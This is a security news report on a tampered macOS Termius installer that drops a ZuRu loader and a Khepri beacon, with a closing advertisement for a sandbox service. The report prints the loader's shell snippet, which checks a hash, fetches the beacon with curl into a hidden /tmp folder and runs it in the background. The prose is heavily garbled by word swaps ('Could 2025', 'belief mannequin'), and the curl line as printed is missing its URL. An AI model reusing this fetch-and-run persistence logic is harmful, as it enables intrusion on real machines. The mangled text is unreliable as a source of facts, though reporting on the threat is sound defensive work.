A recent pressure of the long-running macOS.ZuRu household has surfaced, hiding inside a doctored of the favored Termius SSH consumer and quietly turning developer workstations into distant footholds.
First seen in late Could 2025, the 248 MB rogue disk picture appears to be like and behaves like the real installer however stealthily inserts a 25 MB Mach-O binary into the Termius Helper bundle.
As soon as launched, the counterfeit helper runs the official .Termius Helper1 to protect regular UX whereas spawning a loader dubbed .localized, which drops a modified Khepri command-and-control beacon below /tmp/.fseventsd and begins polling its operator each 5 seconds over port 53.
Polyswarm analysts recognized the pattern’s C2 sample—ctl01.macnavicat[.]com with the Baidu decoy area—linking it to earlier ZuRu infrastructure.
As a result of the implant swaps Termius’s developer signature for an ad-hoc one, Gatekeeper’s belief mannequin is sidestepped, letting the bundle execute with out notarization dialogs.
macOS.ZuRu
The marketing campaign particularly targets IT workers and software program engineers who favor third-party terminals, underscoring the rising danger posed by pirated or tampered productiveness apps.
Past information theft, the improved beacon can switch arbitrary information, run shell directions, and seize output, granting operators persistent, high-fidelity management of compromised Macs.
The rest of this report drills into the an infection mechanism that makes ZuRu’s newest construct each elusive and resilient.
The loader’s first process is integrity verification. It computes an MD5 hash of the resident beacon and, if the outcome diverges from the hard-coded checksum, silently refreshes it from the C2 earlier than chaining execution again to the consumer’s session.
The logic is compact but efficient:-
EXPECTED_HASH=”8ac593fbe69ae93de505003eff446424″
CURRENT_HASH=$(md5 -q /tmp/.fseventsd/Khepri)
[ “$CURRENT_HASH” != “$EXPECTED_HASH” ] && curl -s
-o /tmp/.fseventsd/Khepri
chmod +x /tmp/.fseventsd/Khepri && /tmp/.fseventsd/Khepri &
This self-healing step thwarts rudimentary file-based detections by guaranteeing the payload is at all times pristine.
Coupled with the five-second heartbeat and background-daemon mode toggle, ZuRu maintains low-latency entry even throughout reboots, highlighting how a single compromised utility can cascade into full-scale community publicity for macOS-centric engineering groups.
Increase detection, scale back alert fatigue, speed up response; all with an interactive sandbox constructed for safety groups -> Strive ANY.RUN Now
